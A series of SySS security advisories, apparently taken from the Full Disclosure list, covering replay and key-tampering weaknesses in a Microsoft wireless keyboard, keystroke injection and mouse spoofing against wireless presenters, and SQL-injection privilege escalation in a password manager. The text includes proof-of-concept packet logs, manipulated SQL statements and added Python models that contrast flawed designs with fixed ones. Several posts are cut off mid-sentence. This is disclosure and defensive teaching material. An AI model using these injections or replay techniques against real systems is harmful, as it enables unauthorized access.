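    SJMP is opcode 0x80 and NOP is 0x00, so a two-byte `SJMP rel` can be
    turned into two NOPs because both bytes only lose bits."""
    if code[offset] != 0x80:
        raise ValueError("no SJMP at that offset")
    writes, _impossible = plan_otp_write(code[offset:offset + 2], b"\x00\x00")
    return [(offset + o, b) for o, b in writes]     # _impossible is empty: 0x00 clears bits only
```

key_modification_options() shows the asymmetry the advisory alludes to
with "in a limited way": an arbitrary replacement key is almost never
reachable from the stored one, while an all-zero key always is.
nop_out_jump() is the kind of control-flow change that remains possible
under the same constraint.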



Proof of Concept (PoC):

SySS GmbH could successfully read the contents of the code and data
flash memory of the Microsoft Wireless Desktop 2000 keyboard and of the
USB dongle using the hardware tool Bus Pirate [2] in combination with
the software tool nrfprog [3].



Solution:

The SySS GmbH is not aware of a solution for this reported security
vulnerability.

For further information please contact the manufacturer.



Disclosure Timeline:

2016-04-22: Vulnerability reported to manufacturer
2016-04-23: Manufacturer acknowledges e-mail with SySS security advisory
2016-06-06: E-mail to manufacturer regarding the current status
2016-06-27: Another e-mail to manufacturer regarding the current status
2016-06-27: E-mail from manufacturer requesting further information
2016-06-28: Provided further information and PoC software tool
2016-07-07: E-mail from manufacturer with further information and
question about intended disclosure
2016-07-08: E-mail to manufacturer concerning the planned responsible
disclosure
2016-08-04: E-mail from manufacturer concerning limitations of actual
attacks
2016-10-05: Public release of the security advisory



References:

[1] Product website for Microsoft Wireless Desktop 2000

https://www.microsoft.com/accessories/en-us/products/keyboards/wireless-desktop-2000/m7j-1
[2] Website of Bus Pirate hardware tool
http://dangerousprototypes.com/docs/Bus_Pirate
[3] nrfprog Github repository
https://github.com/nekromant/nrfprog
[4] SySS Security Advisory SYSS-2016-033

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-033.txt
[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Gerhard Klostermeier and
Matthias Deeg of the SySS GmbH.

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2

[FD] [SYSS-2016-043] Microsoft Wireless Desktop 2000 - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks

2016-10-11 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-043
Product: Microsoft Wireless Desktop 2000
Manufacturer: Microsoft
Affected Version(s): Ver. A
Tested Version(s): Ver. A
Vulnerability Type: Cryptographic Issues (CWE-310)
Insufficient Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-05-19
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)



Overview:

Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of
a mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"This keyboard features Advanced Encryption Standard (AES) technology,
which is designed to help protect your information by encrypting your
keystrokes. Each keyboard is permanently paired with its receiver at
the factory - no key information is ever shared over the air."

Due to an insecure implementation of the encrypted data communication,
the wireless keyboard Microsoft Wireless Desktop 2000 is prone to replay
attacks with certain restrictions.



Vulnerability Details:

The SySS GmbH found out that the Microsoft Wireless Desktop 2000
keyboard is prone to replay attacks with some limitations.

An attacker can sniff the AES-encrypted data packets of the 2.4 GHz
radio communication sent by the keyboard to the receiver (USB dongle)
and replay the recorded communication data causing the same effect as
the original data communication.

According to test results of SySS GmbH, the Microsoft Wireless Desktop
2000 keyboard and its USB dongle implement a replay protection based on
an incrementing packet counter. However, the window of packet counter
values the dongle accepts is large enough to perform a replay attack,
provided that not too many data packets (caused by further keystrokes)
were sent between the attacker's recording and the playback.
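The following added example (Python, not code from the SySS advisories or
the vendors) makes the window argument above concrete and also covers the
Fujitsu LX901 case from SYSS-2016-068, where no counter protects the
packets at all. Packet format, key, window size and password are
constructed; the receiver classes model the behaviour the advisories
describe, not the products' firmware, and the AES encryption of the
keystroke is left out because it plays no role in a replay.

```python
"""Added example, not code from the SySS advisories or the vendors: a
receiver-side model of the anti-replay behaviours described in this thread.
Packets are (counter, payload, tag) with tag = HMAC(key, counter || payload)
so that a recorded packet cannot simply have its counter bumped; the AES
encryption of the keystroke itself plays no role in replay and is omitted.
Key, packet layout, window size and password are constructed values.
"""
import hashlib
import hmac
import struct
from typing import List, Tuple

KEY = bytes(range(16))                # constructed pairing key shared by keyboard and dongle
Packet = Tuple[int, bytes, bytes]     # (counter, payload, tag)


def make_packet(counter: int, payload: bytes, key: bytes = KEY) -> Packet:
    tag = hmac.new(key, struct.pack(">I", counter) + payload, hashlib.sha256).digest()[:8]
    return (counter, payload, tag)


def authentic(pkt: Packet, key: bytes = KEY) -> bool:
    counter, payload, tag = pkt
    expected = hmac.new(key, struct.pack(">I", counter) + payload, hashlib.sha256).digest()[:8]
    return hmac.compare_digest(tag, expected)


class Keyboard:
    def __init__(self) -> None:
        self.counter = 0

    def press(self, key: str) -> Packet:
        self.counter += 1
        return make_packet(self.counter, key.encode())


class NoCounterReceiver:
    """Accepts every authentic packet: the LX901 behaviour (replay at will)."""
    def accept(self, pkt: Packet) -> bool:
        return authentic(pkt)


class LooseWindowReceiver:
    """Remembers only the last counter and accepts any authentic counter within
    +-window of it: one reading of the Wireless Desktop 2000 behaviour, where a
    replay works unless too many keystrokes were sent in between."""
    def __init__(self, window: int) -> None:
        self.window, self.last = window, 0

    def accept(self, pkt: Packet) -> bool:
        if not authentic(pkt) or abs(pkt[0] - self.last) > self.window:
            return False
        self.last = max(self.last, pkt[0])   # an old counter inside the window is accepted again
        return True


class StrictWindowReceiver:
    """IPsec-style anti-replay window: highest counter seen plus a bitmap of
    consumed counters below it. Tolerates loss and reordering, but each
    counter is accepted at most once."""
    def __init__(self, window: int) -> None:
        self.window, self.highest, self.seen = window, 0, 0   # bit i of seen: counter highest-i used

    def accept(self, pkt: Packet) -> bool:
        if not authentic(pkt):
            return False
        c = pkt[0]
        if c > self.highest:                                  # newest so far: slide the window
            self.seen = ((self.seen << (c - self.highest)) | 1) & ((1 << self.window) - 1)
            self.highest = c
            return True
        back = self.highest - c
        if back >= self.window or (self.seen >> back) & 1:
            return False                                      # too old or already consumed
        self.seen |= 1 << back                                # late but fresh (loss/reordering)
        return True


def replay_succeeds(receiver, keystrokes_between: int, password: str = "hunter2s") -> bool:
    """Victim types `password` while the attacker records it, then types
    `keystrokes_between` more keys; the attacker replays the recording.
    True if every replayed packet is accepted, i.e. the password is re-entered."""
    kbd = Keyboard()
    recorded: List[Packet] = []
    for ch in password:
        pkt = kbd.press(ch)
        receiver.accept(pkt)
        recorded.append(pkt)
    for _ in range(keystrokes_between):
        receiver.accept(kbd.press("x"))
    return all(receiver.accept(pkt) for pkt in recorded)


def reordering_tolerated(window: int = 8) -> Tuple[bool, bool, bool]:
    """Strict window: a late packet is accepted once; a second copy and a
    counter-bumped copy carrying the old tag are rejected."""
    rx = StrictWindowReceiver(window)
    rx.accept(make_packet(3, b"c"))
    late = rx.accept(make_packet(1, b"a"))
    replayed = rx.accept(make_packet(1, b"a"))
    bumped = rx.accept((9, b"a", make_packet(1, b"a")[2]))
    return late, replayed, bumped
```

With the constructed window of 32 and an eight-character password,
replay_succeeds(LooseWindowReceiver(32), n) is True for up to 25 further
keystrokes and False beyond that, which is the behaviour the advisory
describes; NoCounterReceiver accepts the replay after any number of
keystrokes; StrictWindowReceiver rejects it even when none were typed,
while reordering_tolerated() shows that it still accepts a genuinely late
packet once. The MAC over counter and payload is what stops the attacker
from escaping the window by rewriting the counter of a recorded packet.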

A replay attack against the keyboard can, for example, be used to gain
unauthorized access to a computer system that is operated with a
vulnerable Microsoft Wireless Desktop 2000 keyboard. In this attack
scenario, an attacker records the radio communication during a
password-based user authentication of his or her victim, for instance
during a login to the operating system or during unlocking a screen
lock. At an opportune moment when the victim's computer system is
unattended, the attacker approaches the victim's computer and replays
the previously recorded AES-encrypted data communication for the
password-based user authentication and by this gets unauthorized access
to the victim's system.



Proof of Concept (PoC):

The SySS GmbH could successfully perform a replay attack as described
in the previous section using the USB radio dongle Crazyradio PA (see
[2]) and a simple proof-of-concept software tool.

The following output exemplarily illustrates a replay attack with the
recorded data packets for the word "test".

# python simple_replay.py
Simple nRF24 Replay Tool v0.1 by Matthias Deeg - SySS GmbH (c) 2016
[*] Configure radio
[*] Start recording. Press <CTRL+C> to stop recording ...
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 083816016234008e
[+] Received data: 083816016234008e
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 0838160164340088
[+] Received data: 0838160164340088
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601f7612ae3b196b5767ab0a4dd615651e2
[+] Received data: 0838160168340084
[+] Received data: 0838160168340084
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
^C
[*] Stop recording
[*] Press  to replay the recorded data packets or <CTRL+C> to
quit ...
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 083816016234008e
[+] Send data: 083816016234008e
[+] Send data: 099816016ae20e05e28d72

[FD] [SYSS-2016-074] Logitech Wireless Presenter R400 - Insufficient Verification of Data Authenticity (CWE-345), Keystroke Injection Vulnerability

2016-10-12 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-074
Product: Wireless Presenter R400
Manufacturer: Logitech
Affected Version(s): Model R-R0008
Tested Version(s): Model R-R0008
Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345)
Keystroke Injection Vulnerability
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2016-08-12
Solution Date: -
Public Disclosure: 2016-10-12
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Logitech R400 is a wireless presenter using 2.4 GHz radio communication.

The manufacturer describes the product as follows (see [1]):

"Intuitive controls and red laser pointer make presentations a snap,
even in the darkest auditoriums."

Due to unencrypted and unauthenticated data communication, the wireless
presenter Logitech R400 is prone to keystroke injection attacks.



Vulnerability Details:

The SySS GmbH found out that the wireless presenter Logitech R400 is
vulnerable to keystroke injection attacks.

An attacker can analyze the unencrypted and unauthenticated data
packets of the 2.4 GHz radio communication sent by the wireless
presenter to the receiver (USB dongle) in order to learn the used
protocol. By knowing the used data protocol, it is possible to inject
packets into the data communication that are actually interpreted as
keystrokes by the receiver on the target system.

Thus, an attacker is able to send arbitrary keystrokes to a victim's
computer system, for example in order to install malware when the target
system is unattended. In this way, an attacker can remotely take control
of a victim's computer that is operated with an affected receiver of
a Logitech R400 wireless presenter.



Proof of Concept (PoC):

The SySS GmbH could successfully perform keystroke injection attacks
against the wireless presenter Logitech R400 using an in-house developed
software tool in combination with the USB radio dongle Crazyradio PA
and the nrf-research-firmware by Bastille Networks Internet Security
(see [2] and [3]).

The following output of the developed proof-of-concept software tool
illustrates a successful attack:

# python logitech_presenter.py -a 77:E3:96:AC:07
[ASCII art banner]
Logitech Wireless Presenter Attack Tool v1.0 by Matthias Deeg - SySS GmbH (c) 2016
[*] Configure nRF24 radio
[*] Scanning for Logitech wireless presenter ...
[+] Found nRF24 device with address 77:E3:96:AC:07 on channel 32
[*] Press <CTRL+C> to start keystroke injection
^C
[*] Start keystroke injection ...
[*] Done.



Solution:

The SySS GmbH is not aware of a solution for this reported security
vulnerability.

For further information please contact the manufacturer.



Disclosure Timeline:

2016-08-12: Vulnerability reported to manufacturer
2016-10-12: Public release of the security advisory



References:

[1] Product website for Logitech R400
http://www.logitech.com/en-us/product/wireless-presenter-r400
[2] Product website for Crazyradio PA
https://www.bitcraze.io/crazyradio-pa/
[3] Bastille's nRF24 research firmware and tools
https://github.com/BastilleResearch/nrf-research-firmware
[4] SySS Security Advisory SYSS-2016-074
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-074.txt
[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of the SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provi

[FD] [SYSS-2016-075] Targus Multimedia Presentation Remote - Insufficient Verification of Data Authenticity (CWE-345), Mouse Spoofing Attack

2016-10-12 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-075
Product: Multimedia Presentation Remote
Manufacturer: Targus
Affected Version(s): Model AMP09-EU
Tested Version(s): Model AMP09-EU
Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345)
Mouse Spoofing Attack
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-08-16
Solution Date: -
Public Disclosure: 2016-10-12
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Targus Multimedia Presentation Remote is a wireless presenter using 2.4
GHz radio communication.

The manufacturer describes the product as follows (see [1]):

"Don't fumble around with wires or fuss over the computer; present like
a professional and control your computer remotely, using just one
device - the Targus Multi Media Presentation Remote with Cursor Control.
Thanks to the remote's 2.4GHz cordless technology, you can access
programmes, launch the internet, adjust volumes and play music and
videos, all from up to 15 metres away."

Due to unencrypted and unauthenticated mouse data communication, the
wireless presenter Targus Multimedia Presentation Remote is vulnerable
to mouse spoofing attacks.



Vulnerability Details:

The SySS GmbH found out that the wireless presenter Targus Multimedia
Presentation Remote is prone to mouse spoofing attacks, as the
cursor control data communication is unencrypted and unauthenticated.

An attacker can analyze the unencrypted cursor control data packets of
the 2.4 GHz radio communication sent by the wireless presenter to the
receiver (USB dongle) in order to learn the used protocol. By knowing
the used mouse data protocol, it is possible to spoof mouse actions
like mouse movements or mouse clicks by sending forged data packets.

Thus, an attacker is able to remotely control the mouse pointer of a
target system that is operated with the wireless presenter Targus
Multimedia Presentation Remote. If the graphical user interface of the
victim's system is unlocked, an attacker can for example send a list of
mouse actions that start the virtual on-screen keyboard of the operating
system and execute arbitrary commands in the context of the currently
logged in user, for instance a download and execute attack vector.

As the attacker may not have an unobstructed view of the target system's
screen and may not know the operating system, the screen resolution, or
the current mouse settings, this kind of mouse spoofing attack is based
on heuristics. But against an unlocked and unattended system, an
attacker can simply try different attack vectors for different target
system configurations one after another.
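The following Python model is an added example that is not SySS's tool and
not the actual Logitech or Targus radio protocol; the packet layout, the
pairing key and the MAC scheme are constructed here for illustration. It
shows the common weakness of SYSS-2016-074 (keystroke injection) and
SYSS-2016-075 (mouse spoofing): a receiver that treats every packet bearing
its address as genuine executes whatever an attacker who has learned the
format sends, while a receiver that verifies data authenticity with a
shared pairing key drops the same forged packets before any HID event is
generated.

```python
"""
Added example: a model of the weakness behind SYSS-2016-074 and SYSS-2016-075.
Not SySS code and not the Logitech/Targus protocol; packet layout, pairing
key and MAC scheme are constructed assumptions.
"""
import hashlib
import hmac
import struct

# Constructed packet format (hypothetical):
#   5-byte receiver address | 1-byte report type | payload
# type 0x01: keyboard report -> modifier byte + up to 6 HID usage IDs
# type 0x02: mouse report    -> buttons byte, dx (int8), dy (int8)
KEYBOARD, MOUSE = 0x01, 0x02
PAIRED_ADDR = bytes.fromhex("77E396AC07")  # address seen in the PoC output above


def build_packet(addr, ptype, payload):
    return addr + bytes([ptype]) + payload


def keyboard_payload(modifiers, usages):
    assert len(usages) <= 6
    return bytes([modifiers]) + bytes(usages).ljust(6, b"\x00")


def mouse_payload(buttons, dx, dy):
    return struct.pack("<Bbb", buttons, dx, dy)


class NaiveReceiver:
    """Mirrors the weakness: every packet carrying the dongle's address is
    taken as genuine, so anyone who has learned the format can inject."""

    def __init__(self, addr):
        self.addr = addr
        self.events = []  # what the dongle would hand to the host as HID input

    def receive(self, pkt):
        if pkt[:5] != self.addr:
            return False
        ptype, payload = pkt[5], pkt[6:]
        if ptype == KEYBOARD and len(payload) == 7:
            self.events.append(("key", payload[0], [u for u in payload[1:] if u]))
        elif ptype == MOUSE and len(payload) == 3:
            buttons, dx, dy = struct.unpack("<Bbb", payload)
            self.events.append(("mouse", buttons, dx, dy))
        else:
            return False
        return True


class AuthenticatingReceiver(NaiveReceiver):
    """Hardened variant: transmitter and dongle share a pairing key and every
    packet carries a truncated HMAC-SHA256 over address|type|payload, so a
    forged packet fails the tag check before any HID event is generated.
    (A MAC alone does not stop replay of a genuine packet; that additionally
    needs a counter or nonce, which this example leaves out.)"""
    TAG_LEN = 8

    def __init__(self, addr, key):
        super().__init__(addr)
        self.key = key

    def receive(self, pkt):
        if len(pkt) <= self.TAG_LEN + 6:
            return False
        body, tag = pkt[:-self.TAG_LEN], pkt[-self.TAG_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()[:self.TAG_LEN]
        if not hmac.compare_digest(tag, expected):
            return False
        return super().receive(body)


def authenticated_packet(key, addr, ptype, payload):
    body = build_packet(addr, ptype, payload)
    tag = hmac.new(key, body, hashlib.sha256).digest()[:AuthenticatingReceiver.TAG_LEN]
    return body + tag


def demo():
    """Inject Win+R (left GUI + 'r') and a mouse move against both receivers;
    returns what each one accepted."""
    HID_LEFT_GUI, HID_R = 0x08, 0x15
    forged_keys = build_packet(PAIRED_ADDR, KEYBOARD, keyboard_payload(HID_LEFT_GUI, [HID_R]))
    forged_mouse = build_packet(PAIRED_ADDR, MOUSE, mouse_payload(0, 10, -5))

    naive = NaiveReceiver(PAIRED_ADDR)
    naive_accepted = [naive.receive(forged_keys), naive.receive(forged_mouse)]

    key = hashlib.sha256(b"constructed pairing key").digest()  # assumption
    hardened = AuthenticatingReceiver(PAIRED_ADDR, key)
    forged_accepted = [hardened.receive(forged_keys), hardened.receive(forged_mouse)]
    genuine = authenticated_packet(key, PAIRED_ADDR, MOUSE, mouse_payload(0, 10, -5))
    genuine_accepted = hardened.receive(genuine)
    return naive_accepted, forged_accepted, genuine_accepted, naive.events, hardened.events


if __name__ == "__main__":
    print(demo())
```

The naive receiver turns both forged packets into HID events; the
authenticating receiver accepts only the packet carrying a valid tag. The
eight-byte truncated tag is a design choice for short radio frames, not a
vendor value.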



Proof of Concept (PoC):

The SySS GmbH could successfully perform mouse spoofing attacks against
a target system operated with the wireless presenter Targus Multimedia
Presentation Remote using an in-house developed software tool in
combination with the USB radio dongle Crazyradio PA and the
nrf-research-firmware by Bastille Networks Internet Security (see [2]
and [3]).

A proof-of-concept mouse spoofing attack of this kind, resulting in
remote code execution and performed with the SySS software tool
Radioactive Mouse, is demonstrated in a video (see [4]); it also applies
to the wireless presenter Targus Multimedia Presentation Remote.



Solution:

The SySS GmbH is not aware of a solution for this reported security
vulnerability.

For further information please contact the manufacturer.



Disclosure Timeline:

2016-08-16: Vulnerability reported to manufacturer
2016-08-16: Manufacturer acknowledges e-mail with SySS security advisory
2016-10-12: Public release of the security advisory



References:

[1] Product website for Targus Multimedia Presentation Remote
http://targus.com/uk/multimedia-presentation-remote-amp09eu
[2] Product website for Crazyradio PA
https://www.bitcraze.io/crazyradio-pa/
[3] Bastille's nRF24 research firmware and tools
https://github.com/BastilleResearch/nrf-research-firmware
[4] SySS Proof-of-Concept Mouse Spoofing Attack Video
https://www.youtube.com/watch?v=PkR8EODee44
[5] SySS Security Advisory SYSS-2016-075
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-075.txt
[6] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of the SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public 

[FD] [SYSS-2015-035] Password Safe and Repository Enterprise v7.4.4 - SQL Injection (CWE-89)

2017-04-11 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2015-035
Product(s): Password Safe and Repository Enterprise
Manufacturer: MATESO GmbH
Affected Version(s): 7.4.4 Build 2247
Tested Version(s): 7.4.4 Build 2247
Vulnerability Type: Violation of Secure Design Principles (CWE-657)
SQL Injection (CWE-89)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2015-07-09
Solution Date: 2016-10-18
Public Disclosure: 2017-04-10
CVE Reference: Not yet assigned
Author of Advisory: Matthias Deeg (SySS GmbH)

~~~

Overview:

Password Safe and Repository Enterprise is a password management
software for companies with many features.

The vendor MATESO GmbH describes the product as follows (see [1]):

"Manage your passwords in the company according to your security needs!
Features such as password policies, multi-eyes principle, workflow and
task system makes management productive and safe.

The integrated rights management system with data transfer option and
automatic synchronization with Active Directory ensures that your
employees can only access data which they are entitled to."

~~~

Vulnerability Details:

SySS GmbH found out that the password management software Password Safe
and Repository Enterprise violates secure design principles and
insufficiently implements user input validation concerning database
access via SQL statements.

These vulnerabilities enable an attacker to manipulate SQL statements
on the client side using a "malicious client" in order to perform
privilege escalation attacks or to gain unauthorized read and write
access to other users' data.

Different SQL statements that are created on the client side in the
context of different functionalities of the password management client
software can be manipulated and thus exploited for such attacks.

These vulnerabilities affect both the online and the offline mode of the
password management software, but the requirements for a successful
exploitation, such as valid user credentials, may differ.



Proof of Concept (PoC):

1) Privilege escalation by retrieving information of another user

In order to perform a privilege escalation attack in the online mode
of the password management software Password Safe and Repository
Enterprise from the perspective of an authorized low-privileged user,
the parameter "ID" of the following SQL statement simply has to be
manipulated:

SELECT * FROM tdUsers WHERE ID=

This SQL statement is used by the client software in the online mode for
retrieving user information from the server system after a successful
user login. If the parameter "ID" is set to a valid user ID of another
existing user, for example the built-in administrator account, which
usually has the user ID 1, the application can be used with the
privileges of the user with the chosen user ID.


2) Privilege escalation by setting new user rights

Another possibility to perform a privilege escalation attack in the
online mode from the perspective of a low-privileged user is to
manipulate the following SQL statement that is used to update the
user's last login date:

UPDATE tdUsers SET LastLogin = julianday(''), ChangeDate =
julianday('') WHERE ID = 

By replacing this UPDATE statement with the following one, the user
rights of an arbitrary user can be modified, for example by granting
all available rights:

UPDATE tdUsers SET UserRights =
'11' WHERE ID = 



Solution:

The MATESO GmbH released the new software version Password Safe and
Repository Enterprise 8 that is not affected by the described security
issues.

Please contact the manufacturer for further information or support.



Disclosure Timeline:

2015-07-09: Vulnerability reported to manufacturer
2015-07-09: Manufacturer acknowledges e-mail with SySS security advisory

2015-07-30: Scheduling of the publication date in agreement with the
manufacturer
2015-10-02: Rescheduling of the publication date in agreement with the
manufacturer
2016-10-18: Manufacturer presents new software version with fixed
security issues
2017-04-10: Public release of security advisory



References:

[1] Product website for Password Safe and Repository Enterprise
http://www.passwordsafe.de/en/products/business/enterprise-edition.html
[2] SySS Security Advisory SYSS-2015-035
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-035.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.

[FD] [SYSS-2015-036] Password Safe and Repository Enterprise v7.4.4 - Violation of Secure Design Principles (CWE-657)

2017-04-11 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2015-036
Product(s): Password Safe and Repository Enterprise
Manufacturer: MATESO GmbH
Affected Version(s): 7.4.4 Build 2247
Tested Version(s): 7.4.4 Build 2247
Vulnerability Type: Credentials Management (CWE-255)
Violation of Secure Design Principles (CWE-657)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2015-07-09
Solution Date: 2016-10-18
Public Disclosure: 2017-04-10
CVE Reference: Not yet assigned
Author of Advisory: Matthias Deeg (SySS GmbH)

~~~

Overview:

Password Safe and Repository Enterprise is a password management
software for companies with many features.

The vendor MATESO GmbH describes the product as follows (see [1]):

"Manage your passwords in the company according to your security needs!
Features such as password policies, multi-eyes principle, workflow and
task system makes management productive and safe.

The integrated rights management system with data transfer option and
automatic synchronization with Active Directory ensures that your
employees can only access data which they are entitled to."

~~~

Vulnerability Details:

SySS GmbH found out that synchronized databases (offline databases)
created by a specific user also contain sensitive data of other users,
for example login credentials.

The password information of other users is stored as raw, unsalted MD5
hash values in the database table tdUsers (see SYSS-2015-037).

Thus, by having access to an offline database, it is possible to access
the password information of other users, for example the MD5 password
hash of the built-in administrator account. This password information
may be recovered by password guessing attacks and used for accessing
other users' data in an unauthorized way or for performing privilege
escalation attacks in the online mode.



Proof of Concept (PoC):

In the offline mode of the password management software Password Safe
and Repository, it is possible to manipulate SQL statements due to
the violation of secure design principles and SQL injection
vulnerabilities (see SYSS-2015-035).

By using the following SQL statement, the information of all users, which
is unnecessarily stored in the database table tdUsers of an offline
database, can be retrieved and extracted from the memory of the password
management software, for example by using a modified client:

SELECT * FROM tdUsers
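The following Python model is an added example, not MATESO's code and not
part of the advisories. Only the table name tdUsers, the column names ID,
UserRights and LastLogin, the julianday() call and the unsalted MD5 hashes
come from SYSS-2015-035 and SYSS-2015-036; the remaining columns, the user
records, the rights string, the word list and the server API are
constructed. It puts the two PoCs of SYSS-2015-035 (client-composed SQL
executed by the server) and the offline-database issue above side by side
with a server design that owns its statements and binds the authenticated
session's user ID itself.

```python
"""
Added example: a model of the design flaws in SYSS-2015-035 and SYSS-2015-036.
Not MATESO's code; table layout beyond the named columns, user records,
rights string, word list and server API are constructed assumptions.
"""
import hashlib
import hmac
import sqlite3


def md5(password):
    return hashlib.md5(password.encode()).hexdigest()  # unsalted, as in the advisory


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tdUsers (ID INTEGER PRIMARY KEY, Name TEXT, "
               "PasswordHash TEXT, UserRights TEXT, LastLogin REAL)")
    db.executemany("INSERT INTO tdUsers VALUES (?, ?, ?, ?, ?)", [
        (1, "Administrator", md5("winter2015"), "11111111", None),  # constructed
        (2, "alice", md5("correct horse"), "10000000", None),       # constructed
    ])
    db.commit()
    return db


# --- Flaw 1 (SYSS-2015-035): the client composes SQL, the server just runs it
def server_run_client_sql(db, sql):
    """Models the original design: whatever statement the client built is
    executed with the server's database privileges."""
    cur = db.execute(sql)
    db.commit()
    return cur.fetchall()


def malicious_client_profile(db, target_id):
    # PoC 1: the legitimate client sends its own ID; a modified client sends ID 1.
    return server_run_client_sql(
        db, f"SELECT ID, Name, UserRights FROM tdUsers WHERE ID={target_id}")


def malicious_client_escalate(db, target_id):
    # PoC 2: the LastLogin UPDATE is swapped for one that rewrites UserRights.
    server_run_client_sql(
        db, f"UPDATE tdUsers SET UserRights='11111111' WHERE ID={target_id}")


# --- Flaw 2 (SYSS-2015-036): the offline copy carries every user's hash
def crack_unsalted_md5(db, wordlist):
    """With SELECT * FROM tdUsers available offline, one MD5 per candidate
    word is tested against all users at once; a per-user salt would force
    one hash computation per user and candidate."""
    by_hash = {h: name for name, h in db.execute("SELECT Name, PasswordHash FROM tdUsers")}
    found = {}
    for word in wordlist:
        h = md5(word)
        if h in by_hash:
            found[by_hash[h]] = word
    return found


# --- Hardened design: the server owns the statements and binds the session's ID
class HardenedServer:
    def __init__(self, db):
        self.db = db

    def login(self, name, password):
        row = self.db.execute("SELECT ID, PasswordHash FROM tdUsers WHERE Name=?",
                              (name,)).fetchone()
        if row and hmac.compare_digest(row[1], md5(password)):
            return {"user_id": row[0]}  # server-side session state, not client data
        return None

    def profile(self, session):
        # The ID comes from the session; the client cannot choose another user.
        return self.db.execute("SELECT ID, Name, UserRights FROM tdUsers WHERE ID=?",
                               (session["user_id"],)).fetchone()

    def touch_last_login(self, session):
        self.db.execute("UPDATE tdUsers SET LastLogin=julianday('now') WHERE ID=?",
                        (session["user_id"],))
        self.db.commit()
    # No operation exposes UserRights to the client at all.


def demo():
    db = make_db()
    stolen = malicious_client_profile(db, 1)  # PoC 1: read the administrator's record
    malicious_client_escalate(db, 2)          # PoC 2: grant alice all rights
    alice_rights = db.execute("SELECT UserRights FROM tdUsers WHERE ID=2").fetchone()[0]
    cracked = crack_unsalted_md5(db, ["password", "winter2015", "summer2016"])
    srv = HardenedServer(db)
    session = srv.login("alice", "correct horse")
    srv.touch_last_login(session)
    own = srv.profile(session)
    return stolen, alice_rights, cracked, own


if __name__ == "__main__":
    print(demo())
```

In the hardened variant the password hash is still unsalted MD5 for the
sake of the comparison; a real fix would also move to a salted,
work-factor hash so that an offline copy of tdUsers is not cracked at
wordlist speed.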



Solution:

The MATESO GmbH released the new software version Password Safe and
Repository Enterprise 8 that is not affected by the described security
issues.

Please contact the manufacturer for further information or support.



Disclosure Timeline:

2015-07-09: Vulnerability reported to manufacturer
2015-07-09: Manufacturer acknowledges e-mail with SySS security advisory

2015-07-30: Scheduling of the publication date in agreement with the
manufacturer
2015-10-02: Rescheduling of the publication date in agreement with the
manufacturer
